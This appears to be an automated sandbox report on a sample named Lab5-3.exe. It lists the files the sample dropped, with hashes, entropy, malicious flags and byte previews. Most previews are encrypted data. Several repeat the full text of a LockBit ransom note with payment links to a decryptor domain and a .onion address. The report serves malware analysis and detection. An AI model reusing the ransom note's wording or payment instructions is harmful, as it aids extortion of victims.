                                                                                                          Preview:6..Bf._!.3<.]....)i.O-ctdX..".p\.@!-9.-..8Q.7.Vk.z!.m;......h.!....j.TN.En...V.....?;-Z4.a.W.x.T..#....L.7d.l...jN.v.>..?.C.B....`x..m>..Q.&2U.\zp..d...<...H....t...........F........UTE.n..-..RXa.`..5Le...Y..;.C..rmMW..".r. ./.2..).R...F.....TdH........{....p....%..T..I88......M...^....|.$`...1..dT....E.....i)) ...."...u..#..|......;u...^.Pj..;.,.._.n...p)...%.(.WN............*..|..&.......2..S..g<..].7..."...Ji]Y..2+.a"......,.({sz.v.PIK.=.TC...x8..<E<.2?\.;f.<p.....WUuf.9..G.>m..;c^..Ho...B.B..su.V.Uf.....u.X..tS..~..I.w..Il.]..x.S.|.8...BU.....Y...B...!."...A...$...3..A.V.Y.N$Yx.Ee......Z.....Pw.2O...R....*.P.sO...X(...[..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):188400
                                                                                                          Entropy (8bit):7.998814995675944
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:LPeBMp94Ahib9MhcI9hPWO1LhtL3NJlzJTl9vdBNfjOtzAy8S204ja2W0s7BuHpZ:LmBM899I9p7rtLXfq0NScjlJZ
                                                                                                          MD5:F9DC854F68268CDFF71863AB19669BD2
                                                                                                          SHA1:E6A839F2E7774B302D62B76021FA0602FDE750BC
                                                                                                          SHA-256:D8DB8197A6C9E5A749A1458568946CF0DA75C334E3F31596AF5E160528AD75A7
                                                                                                          SHA-512:51C730687A01A963B3445455B10F589210E7F04C53E5CB211C916EC8F76C9787BA426D1D251AF612DA2D31E7258565D3F3E10E2B980C5A787BF705341B420D03
                                                                                                          Malicious:true
                                                                                                          Preview:.A..hu..b...8 ..i.K..f<v;,o.....3......V.....!!O.........TR..o.{...D...x.-7_.52OT..{M.........V[..?f..rxmY..At.=e..e...@+xJJ.9..1\..@.1UR....;.x1#..[S..i6O..3....M$$.#_.....I....W.C...B..8.......c..S.....x<.....y...0.I..K.C.['.U...o.!Q.~.T....Z&B.%eI.>!...P..w...1...(.l....r...w.......9.G.)B..Q. ..h...(.<[......%..:.)...<-c....pU.......,.}.C.U/....OY...;..(.J...G'"..:.~e72.$x....p......9&...Z.U......jp..R.~9..U..2....*.....%".K..}.2TW......%.H....J.u...\.Z..C..|.<ToNME../(..O}_..p..7..WNK..[....nG.Ar......l0.C.y...7+Sq...D`.)2.E........o.(....-.*.i..s......W..}..?..O@.;k...:..$.I>d.e.....n....M..[.5D...J.q..u.qb.. ..TTu.....q...D7>.. ...}..x....dw..[w........j......"J/h.....`d..._..e..>.ShJ.%._.'g].a_;.c......b<i?p.S.c]/5@......l...lN...07.:.O..r.t.6...0j(@j..8^....Bi...{..S..H.g.2...h.j....grj.>G.(.%.....H}..I.L.....~...5....X"?......d.xB..e.k....'.0...4.._..>.....2.?.K..@k.FaN......I..$.RR...>.FB..]..q..5...c.....\.!.........Lk..!..rW..(..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3984
                                                                                                          Entropy (8bit):7.952622258760487
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QJnig5rPEycmM499Y0dWVNcWgug+lGx0uKeY2ElUJ:+LEycmM4YDfct0Cb
                                                                                                          MD5:C376A8A2A06D56986F82BE251929F388
                                                                                                          SHA1:C641E4F3E112471459C71AD22B2E6C44D1D98D8E
                                                                                                          SHA-256:994EBB41D0A42409C168A658C92E22D336FBF6F30278ABDC876ED6623F926DB8
                                                                                                          SHA-512:08B9784FBD1DA883FF164C3FA72487401A67D4F3C2178967FCDE45461C528DC95648DB3B53318FFEF40154D94EA8F845AE69ACA40F91186D6084C8E2A64C7CCF
                                                                                                          Malicious:false
                                                                                                          Preview:..93g..nP..$.#J.})...~...b.N...A....m,...w.../j...7....d^.D37.!.........nS....l...}..0.4.....9..!....0...]..3.k||j...B....^....ID.g.]....6$n.~^....v.f..y..5......G.Ii=.2,(J.<.......M.y...x.w.v.{.QR.v.....W.,.{....Dk.C.;2.-..O.y....t..../.W9o.n..[...... Y..M.f\..c.xla....t&xO. C..?5#..q.v...!..B.........F..-..q.4....Ex....4.M..._......i.K..../.~z.c~...=....F..R.P0....L=.L.Tr..D&g.Y.(S..Rj/.)..n..mY}...a}[~.A!.......[.pQi.l1+..`A..r....8E|..?-......0;a...s..E..8h.4ep.^.]...Iy..L...I~.?0.UU..i.RK.SF].s..P.?..~`eI.....<g{.HbP:.T..!.Y.D.~X....wz.[.....J6.z.U.F.7.u.F.o..yg../E..<.xM\....|.'...R.0..fq.S_2...R....K.N_.".L$..sSB...W.8S.C.""..DG.>.?Q.......Z.%....+.m..TMG7..F.....P.,........D.3.......9.}....o....~..VA.....nB.]..Y..p6...e9FF.... ..<.=,...'.`6H.z.....+fR.$|/3..o..B..6Y......i........'.....g.k."....>.K....la\..7.....O.p.xt)..^..t.:.3..x.......F..e....S.u...\....%.gd......*.1...x.....9.h.7.u...F5..\...'.N.fv.<.....#. Z.G]^.m9..*...\.\\.A.{.22....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4752
                                                                                                          Entropy (8bit):7.960100381339702
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8yfWNZvNM50/gm6Zb1mMa47GED2wnrSuTOB5cAlCIGx0uKeY2ElUJ:8yOjVAHNp1dgwprSu+WR0Cb
                                                                                                          MD5:63224880CB5210FB5BDEECD46FC5B4C1
                                                                                                          SHA1:15748592A248FEFFFB4B67496DE4B65C80611EC0
                                                                                                          SHA-256:E3CC0E9A3DCFEF1EED50243882E75A2EB0A877D6F651E946C447014663F57DC3
                                                                                                          SHA-512:C57DA6ECFB16814D61B1A3E155E3E00BEE03590210C3E2756C68F6B1FFB3B13648E8BD1D047A148109771267B9F9A9A37F9C7A5B9ADEDBAD267D939710F9F647
                                                                                                          Malicious:false
                                                                                                          Preview:R5#T....:....fOi..<Sd..d..d.l..U.eQ.3x.~...j.$/.......?..0"..).m.....fI.H..HE.=.Q..{.3.9..8......'G..t..C.o.J..H(....!.....u...i.I...H.l....C.....I..j.....y..D?..@Z.Nf%.D.....dl.m.Q.9...W$1...90......M.;....7....\......x..~..s.d....9...........\Y-..d..`.C..Z.Y... @".,,..&.NXn$.".h.Iu...*m..v...|.6Q.x^.n4.....L.}.....|...<.....7.....%.@......Q..B....QnF.Ng#K....=.I..*9{..j...[.*..Z.f.W]Xp).5i<.N..<>.1..E/.o.r8?Y...+....9<...............?j.Q.....F....&I.tn........:4....H.....#...p. U...W&....p{R..#.D...w...^q(.....~..a.\.wD.=x[....Y....;.*...x.6o..7[.'wn5.>l..F..l4....P.c..LTH.X.O.L.mu.s.....Z......d....a<......c..2..p..0d.Qd.n.....Dx.9..n1....&F[.27.;.[P...%k.7BNM./...G....xc.Bz..m...P.e..%..l..A.....DW.....]...|v..._]..H...,|<..=.O..0]....T....z......a6&.=.R..6,.0.D. \.dF~.../#.C|.o..e..o...A.D..>..!.#[.. H<.......w"n;g`B*T..`e..2.8..y:.[C.8ME.:5..$..T9.>..S&.L.....5.X..6*m{..C.E....:..1O03...4.y...F..5. a.hF....X.x..e.O....K.V...K..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4528
                                                                                                          Entropy (8bit):7.961008463789739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:DUmpNaTNwmhyC8t6w8GwedWlf7ukvmfre8Lf80Gx0uKeY2ElUJ:4qNaxaCI6ZedWlf7lvgr140Cb
                                                                                                          MD5:D99EFEC841B02D50BFF7DDC524C417D0
                                                                                                          SHA1:A0330B28B5D2A988587E78B141A4346C25C492C4
                                                                                                          SHA-256:F980CC4AEA83619A7EE9E0680DDF7EBE60B3D95909B7A9702D587004D2512BD5
                                                                                                          SHA-512:929D34F3323B9616BA9FEC84E9C39DE069A887B4E665BAB4022F054FD624439763E8225C2478B129771EDEAF54D0EB8E2A19622AEF695AFEC540B1DCD0401A2A
                                                                                                          Malicious:false
                                                                                                          Preview:...<.1..._...~.......x.4.&....VGr.y..cH.......z5..S...6\.......U.Q)G4..'......(-.+..#.N|.I..h....j.%....L...C.Z...w..8..0.0...Q.Ojd..,...e1N...ul..a..\.......$..&0......&.H.....0u?..F....xq5...T......h.L...\Xzupx..x......W,,..i......./1.w<.sX.}.....j.......O:....9..1.e...|.u....1A..}.I.a3.'D;.+.#..i....Y&i...b....~..... $./.@...!.T....Q..^...O......h.%u(:#..2=.G.`Z.B.0...."eB`u..;..o'...T.....,h...Q.(@4Y...i...B.3.....`..".?-...d..6..Ke..[j.j.S.3...^i..7.{v8.J+;~..p....WX.p..Zeq.q...Q..}..K9.s..(.v......G.1.o....[..VV.....jm...R*...V......{...PN..w.E.8.y.f.W/..o...u...\....R......ZN...-.......5j.A.....Rrs.._..!@..HH,.s....|...N'....%.y.....d.x..n...R...W..b.V+...z.Q.....=..J....5S.H..J_).pF....*..&.&..o./..`......W4...P.9..".h...M.oTr(....j.k*EcM~..w...Z.]xDL...(.aA...2................./...L*.{.y...ny...N...j....6.mwpL*....jD)..;e..U\.3*.BC;7...e.3........>o.{/`..v....1".2..$4Y...}<.[.XAIA..T.]7.4=s..X.T..]D....5.]+np....p~...........%..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.901099543227065
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IGVSrgzWRwYJ1EjEZzHfUTid3hBaUoSGFcmeykEdEElU92i:Zqg2wQh+Gx0uKeY2ElUJ
                                                                                                          MD5:FBCD71A5ED8D77E41B2A4D9B1F8A048E
                                                                                                          SHA1:1BEA5DE396DBC9668CF28684B3B4988297F14D69
                                                                                                          SHA-256:CCCF65C3581187F2E0E2E63BAB0FE81C52EC0761B163F7BF6B5A633B831804C3
                                                                                                          SHA-512:90783673E0895BEA7E65F0ED335DF6BA417DAB45C0684897ABA4ED0F54889FAC17EEEAF9B9461029DB4638B6F1934D8240D9214FB04E19921731B5DD0ACC8BE1
                                                                                                          Malicious:false
                                                                                                          Preview:y./r...Q... .....vG3=.....&..<........0....B...`.1B_.c..y.....B..AR..qM..~....=~J..m.a...I...=.H?.SQ(.....0B..O.EAk!.Y"o(.Z..xy.l.XV.V$u+L.HD|&)r...>..-.o.....&.j....j...h......*..`{...V.9.....[.K.. ......6}.;.........G/Cd.Cg{U?.u.jR[...Q$z...'.n+{..9L...$h..`..Y.^. ..Yth........G.~.U'l.5...M..y{:..Ew#..C....m...q.].....q?...[.........|.?....a+...@...+,..D.,.8..M.o..1....s...y...\8.a...>..>........_..{(..4".8..Mt{..w....!....e(..@^..W.687.$..S!.....0E..$.(S.._.F....5.l..D.N.?.|a.V.t...<o.k...y..JI..J6.c-...A}...y..O.A=...x.....3..16'...>Z".(.x.QECg6X.Q|......T*.G8.p"m....D.Gg....}.......x3t..MW.mj........D7Q@.y.No...%..\.....P....&(......b%.[..O..>......y|Q..l.T.....Y..~h.(...o..?.g..6.p...x..9.....1...j..1..O!.fB..{*...7U.]....B.c..........w.e....P.P7.....d..G..)Bms...!...0......Ow...+..[.l:".y.....r.S.m.T..y_.(...6...Y.8....-.....Q.S.....[.BA;...M.o.D.e..."..Z..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2016
                                                                                                          Entropy (8bit):7.915357180164347
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qXzguLZtfrDDZBNYwYAVKHfUTid3hBaUoSGFcmeykEdEElU92i:UlLzXDZkwHVlGx0uKeY2ElUJ
                                                                                                          MD5:87B654B14F63988705A020583F50BA68
                                                                                                          SHA1:AB1681DD35CBA6F4043D1CE7BB438A03EEF53C78
                                                                                                          SHA-256:89728921ACC096A596F2EA0032F13EE90BE4E5E4DFED49CD265875F776EB1016
                                                                                                          SHA-512:036E9DA17717423A5976F4FAFC4C33792DA272501204511AB540C1E877E4AF8A467703A9B67EC19FB4D099A44B005E1FCC5433AFBD4AC1150DF0D604A8C31BFC
                                                                                                          Malicious:false
                                                                                                          Preview:).h...M..U.~!L..C.D.+...~.z..O...8*.c#.Z..g...v....ht..{.E...eu...q.....k..fw.PF..-m..6.8..) K.{..R$...\.x.`.5.0,%.\b?Ur...s..z.....#..-.&....3.....eA..W.....x...*..w.&e...w..."...\&....P6.O cJ...N...&...;...nj[....D.X....wQ-.9.p..vp......T...&...8..>.'....%.%..%73..cb.Y.........go..@.}.*I.(.UO.U...e.1..hZ..7=.Q)...9|.9V*.y....'......|.A"...ZN....Y#.)>....DJE.kF....!...<.WO..U.].].^...>W}.N.g......UM..Y..vpS...b.......B.m....)...v....*..A.8...s8....(..X..e,.W}....D...K..b....4...#..P..|.\.7....H*.A$"3..F.....a\.@)s...f.#l`bX...?=...u-.[P.........Iz..R.9X..q..S^...V.......V..g!b-.#\i...c#N....D.....^.j...qL.........?h.T.`.,......L..z..b!J.H...X..r.....`%b8.;...#'..".e..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4704
                                                                                                          Entropy (8bit):7.960297069719169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ZXA89fEyo33qgzEl7hvBB0UIkEqMsSf6dJFGx0uKeY2ElUJ:ZT9vo36MWdL0UyqM/0Cb
                                                                                                          MD5:F7F6C8E796AF9667B09E66BF51D04501
                                                                                                          SHA1:D92B0A289F8C268B1D1C441AD0FE946EF204C1B4
                                                                                                          SHA-256:648017F412339DEEE4A450522FECDDD5FFB6776AF38993023C093B5DB1931743
                                                                                                          SHA-512:8DED32D2270E6BB0E0EA12C540C54E473E89FDE126FE556259ADD847061307D4552333AB98297DE117EA792A0AA8D332937FEBB5D0683EB140BE3F052913B65E
                                                                                                          Malicious:false
                                                                                                          Preview:8.8#u...%ui/x...Sl<oW.....l%R}.`^T92.Dn....R..e.....6;..>'XZ..7./N9X..h..Rv.t..nH;.=_O.1.N........S..#.6.T..`9% ....?.>.....G..'.....A.......q@...j.gg... Zl.&...q..z....G.0....45.B..>?`...C...&......wQ.wDykN..Kr....T~N..6@..o(i.i.B6.1.!ve..*.m.]Q..*...7...'...E....e.7!....-....e.+"/b..I......UX.S...B.s....i&.....2!^&_.G..L..&.<E.X...y...:B......g.X.9;).D.."v.-a...RL.Z...:...5"~......`E...N..q....,.<..X8..Q..L..'..b.^...).....N....!..4...I.&...1}.VL.3.f...d..R..B.K...dBd...........(....V.[B.,..#m.P5|..s..,wN~{.wB.F.Ab...a:A.....`y......Z...^1...._T..3.._.J.I..kg.u.OX:...q'a..+C.....#.U.........T'..vaN..x..g.5.f.f{'._...........!U......B%...}..R.b.%YQ.z.. ..eE%.....hp..<:....K..|...Kv.N.v.....K...T....Gi.....`...QK....[;:P.(X.jr...QW...B.\#.j\w_.\.q.B..v.r......|........j...M3N....6...k8.&&v.+6.*f..w..9F[.....F....g..22...d5...SL.q...1p..=.7.......:.(.tkz.b.N...Q...I;h R..P..?K..59.&|AP..NA...c...Mu.]..=.].........%prQ.K..y=..."oh
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6080
                                                                                                          Entropy (8bit):7.973263978478158
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:JVsvcYc+KYQpRokZZ1yzkckpv1nnTX83UK40cXr1HwfGx0uKeY2ElUJ:JKUYtKh7okRyzAxTX83Pbc0Cb
                                                                                                          MD5:6CC23F453E275C846FB274062912FD55
                                                                                                          SHA1:72773089D8F4FD8794BD0FAA1D45DFD17756109B
                                                                                                          SHA-256:B22D29C0B56E062EB2057846FB9F172EDAA5BD969010223F36728DEA0CA9E24B
                                                                                                          SHA-512:1CC6B3B8597984AD42F84AB5C2F552520FEB70C9B5131E1BE85DBC83E0CAE55D4E4A74DBF1C424F8D106AF0CCB7CECC44933C74E23AB8E03B6014EB00DF91524
                                                                                                          Malicious:false
                                                                                                          Preview:...H.0}5M.7 ,.."..p....W>{'..m.......%.oN.W=....d..3.s5c.o.4.......-..I.w..@ .F..-.B.. h.E(bd...'.xBM...7....f...J1O?.-.m.;<Ao.......f..%.D8...7.<`..w*....G.._..g<@.7....`3......p6....)g..6J/`..t..9W...>....%..dF..."J.K.....!...<....A(....t.5,......9.f9.)`..o.D.O.P..(.#.9r.Q..E.G......z...N[..b...=.....E.O.5...1E.%.7V.w,..{e.Q?...Kh.,/.=...{.fL...!S...}i]`,.3..>|4.E;=?.d...e..B..v_.....c..ST....03..H,..V.+.8R..XB.........m...:.5v%..]R..;/M..6x..4}..k..c.j.s..........U..At..a)..4s.....P.*.m....)3..q.....N..T.TG.^..<.&.G4#....H......x.........v....z08.y.[..@....M.."V..q..r..#.8...-(....i.^....2..;....o..&..]..E...7.:.IJ.W.......X...>Pus...\./{.l.Xz..D.Y[.j.f.2......>hP+.BML..>....V.m.9...b..%{.........[.......^.y.......b.{K.{*.3.....,.|.e....j5...n..._.d.+z.qk...$.5..X...eRg.o}..TJ..A..N..j..ql.,....\.i3..=......3..qB..s. '..(R.F....j.G....Q.WK...W@..s......./i..IG(.f...R6.S.+.8....Q.>.M.F.>...XX W..&/x.L2....dh....P.........l...J.bi.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3024
                                                                                                          Entropy (8bit):7.934609470914932
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HaIaNeS7sQ35PSdy0Lq9OlSP9xWDyq6HfUTid3hBaUoSGFcmeykEdEElU92i:Ql7sQ356dpLyPTWxGx0uKeY2ElUJ
                                                                                                          MD5:DEC0F72BCDA4831D88719E38107CCBAA
                                                                                                          SHA1:0969042EF380B039C8FBA6EE66ED377E8C729DD2
                                                                                                          SHA-256:2B14E8A17412560C420321E4771303676E69C2A3817EF0BD83B74DFC2CA4CEA6
                                                                                                          SHA-512:B4B8227D85E11F451F68712F4301290AE24686A251DF1E92D00086A046A681A248F0337DF5C80B47F66AE510A6D7A087A0350F9BB4DA7E21CC36B0DB3E890F2E
                                                                                                          Malicious:false
                                                                                                          Preview:......J....t..a.=.L..\.=....M......Wg$,<....V..>.R.W..6.I_...%..S..|...;......s?+ZG......7..I..d..Yvq.l<..~.n....:C...T;.k.,..$...q.....u..b.....dQ3.....9T.c.?....w6Bm.....;.y^..*..$.%....g..m{>.S.8.K.[.....rA../k.o..\.Z....$e..%..:.].W.7Oe....b......."..8.W%..(../....=nQ..2.>UFv....Vg.hEKZ.9..9.o....;...".Fizk.P.x..9&.....;.1..1k...]_y...d...a..#.hj.....bj......'R.>?.2....^;..J../.......x.\1;Y.......A..2.u(.t..G.......~.n...JN.{'..-H....>...*o...sN...d.M.......kt..?A.......R#.....#.2.........E...cw.F.M..buP.x.suFk..W...^..}.i....i..Wm.XN\T...ew.Z.x..a......{..J.a.!..k2.. ..Z.nd..Q........H.....>...R ......T...e.....R/..ms.......l...z.!..I5.{..8..\.CNE..F.c.[,..>a.tv...x....[..(.2.Y..F.j}......E..._.f.).s.....5&.....x....+......M@.S.%.~.i...@...`..:$.Dy.;.3.6..U.m.G.x3x...i).l..1...3.g..,..I...M.u3-...h.^q....6!...I..VD.E....*R...b.|=.7s..^=...;2'n}.e..M......QA.-1.......$..=u......"..6.[....<&P.a2.k6..e. ....'..I.*....rg....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
